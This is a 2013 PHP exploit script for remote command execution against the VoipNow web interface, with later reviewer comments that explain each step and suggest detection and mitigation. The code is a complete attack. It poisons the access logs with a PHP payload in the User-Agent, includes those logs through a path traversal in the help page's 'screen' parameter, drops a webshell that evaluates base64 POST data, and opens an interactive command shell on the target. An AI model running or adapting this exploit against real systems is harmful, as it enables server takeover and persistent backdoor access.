i-Hmx

VoipNow , Remote command execution Exploit

Apr 21st, 2013
  <?
  /*
  + Application : Voipnow
  | Download : http://4psa.com/
  | By Faris , AKA i-Hmx
  | n0p1337@gmail.com
  + sec4ever.com , 1337s.cc
  */
  // NOTE(review): proof-of-concept script. The requests later in this listing target the
  // VoipNow web interface's /help/index.php "screen" parameter and the application's access
  // logs; the comments added here describe what each step does and what it leaves behind.

  // Banner output only; nothing is sent over the network in this section.
  echo "\n+-------------------------------------------+\n";
  echo "|                  VoipNow                  |\n";
  echo "|         PHP Code Injection Exploit        |\n";
  echo "|                  By i-Hmx                 |\n";
  echo "|                sec4ever.com               |\n";
  echo "|             n0p1337@gmail.com             |\n";
  echo "+-------------------------------------------+\n";
  echo "\n| Enter Target [Ip Only] # ";
  // Reads the host from standard input. The value is trimmed but not otherwise validated
  // before it is concatenated into the request URLs further down.
  $target=trim(fgets(STDIN));
  echo "[+] Attacking $target\n";
  /**
   * Sends a single HTTP request with cURL and returns the raw response.
   *
   * @param string $url    URL to request.
   * @param string $post   Value handed to CURLOPT_POSTFIELDS (callers in this listing pass '' or "fa=...").
   * @param string $uagent Value sent as the User-Agent header.
   * @return string|bool   Result of curl_exec(): the response text, headers included, or false on failure.
   */
  function faget($url,$post,$uagent){
  $curl=curl_init();
  // Return the response as a string instead of printing it.
  curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($curl,CURLOPT_URL,$url);
  curl_setopt($curl, CURLOPT_USERAGENT, $uagent);
  // Hard-coded Referer: the same value appears on every request this script makes, which
  // makes it a usable match string when reviewing web server logs.
  curl_setopt($curl, CURLOPT_REFERER, "http://1337s.cc/index.php");
  // POSTFIELDS is set unconditionally. NOTE(review): libcurl normally switches to POST when
  // this option is set, so requests with an empty body are presumably logged as POST too -- confirm.
  curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
  // Both cookie options point at '/', which is a directory rather than a cookie file.
  curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
  curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
  // Certificate and host-name verification are switched off, so any certificate is accepted.
  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  // Redirects are not followed; the transfer is limited to 20 seconds.
  curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
  curl_setopt($curl,CURLOPT_TIMEOUT,20);
  // Response headers are included in the returned string.
  curl_setopt($curl, CURLOPT_HEADER, true);
  // No error check: a failed transfer is returned to the caller as false.
  $exec=curl_exec($curl);
  curl_close($curl);
  return $exec;
  }
  // Value sent as the User-Agent header (third argument of faget()) on the requests below.
  // It is a PHP snippet wrapping a URL-encoded string. Decoded, that string opens
  // /usr/local/voipnow/admin/htdocs/templates_c/1337.php for writing and stores a short PHP
  // file that prints a marker line and evaluates base64-decoded data from the POST field "fa".
  // Detection: a User-Agent value that starts with a PHP open tag in the access logs, and an
  // unexpected 1337.php under templates_c, are what this step would leave on the server.
  $inj="<?php eval(url_decode('%24f%3Dfopen%28%27%2fusr%2flocal%2fvoipnow%2fadmin%2fhtdocs%2ftemplates_c%2f1337.php%27%2C%27w%2b%27%29%3B%24data%3D%27%3C%3F%20echo%20%22Faris%20on%20the%20mic%20%3AD%3Cbr%3E%3Cb%3En0p1337@gmail.com%3C%2fb%3E%3Cbr%3E-----------------%22%3B@eval%28base64_decode%28%24_POST%5Bfa%5D%29%29%3Becho%20%22-----------------%22%3B%20%3F%3E%27%3Bfwrite%28%24f%2C%24data%29%3Becho%20%22done%22%3B')); ?>";
  echo " | Injecting Payload(s) [ Time Depend on server traffic ]\n";
  echo "     + [0]";
  // Requests /help/index.php with screen= set to a ../ traversal that resolves to the
  // application's own access.log. NOTE(review): presumably the help page includes the file
  // named by screen, so PHP text previously written to the log is executed -- confirm
  // against the vendor advisory. Server-side mitigation: resolve screen through an allow-list
  // of help pages instead of a filesystem path, and keep the log directory unreadable to the
  // web server process.
  faget("https://".$target."/help/index.php?screen=../../../../../../../../usr/local/voipnow/admin/logs/access.log",'',$inj);
  echo " > Done\n";
  // Same request against access.log.1 through access.log.3 (presumably rotated log copies).
  for($f=1;$f<4;$f++)
  {
  echo "     + [$f]";
  faget("https://".$target."/help/index.php?screen=../../../../../../../../usr/local/voipnow/admin/logs/access.log.$f",'',$inj);
  echo " > Done\n";
  }
  echo " | Testing Payload Execution\n";
  // Fetches the dropped file with a fixed Netscape 7.1 User-Agent string and looks for its
  // marker text (eregi() is a case-insensitive match); the script stops if the marker is absent.
  $fa1=faget("https://".$target."/templates_c/1337.php",'',"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
  if(!eregi("Faris on the mic :D",$fa1))
  {
  die("[+] Exploitation Failed :(\n");
  }
  echo " | Sending CMD test package\n";
  // The base64 value decodes to passthru('echo farsawy'); the check below looks for that word
  // in the response to decide whether OS commands run. If it is missing, the script exits and
  // reports that only PHP evaluation through the "fa" field is available.
  $cmd=faget($target."/templates_c/1337.php","fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
  if(!eregi("farsawy",$cmd))
  {
  die("   + Cmd couldn't executed but we can evaluate php code\n   + use : $target/templates_c/1337.php\n   Post : fa=base64code\n");
  }
  echo "| sec4ever shell online ;)\n\n";
  // Interactive loop: each line read from stdin is wrapped in passthru('...'), base64-encoded
  // and posted as fa= to the dropped file; typing "exit" ends the script.
  // Detection: repeated POST requests to /templates_c/1337.php carrying an fa= parameter,
  // together with the fixed User-Agent and Referer strings used by this script.
  while(1){
  echo "i-Hmx@$host# ";
  $c=trim(fgets(STDIN));
  if($c=='exit'){die("[+] Terminating\n");}
  $payload=base64_encode("passthru('$c');");
  $fuck=faget("https://".$target."/templates_c/1337.php","fa=$payload","Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
  // kastr() is not defined in this listing; presumably it returns the text between the two
  // marker strings -- TODO confirm.
  $done=kastr($fuck,"-----------------","-----------------");
  echo "$done\n";
  }
  ?>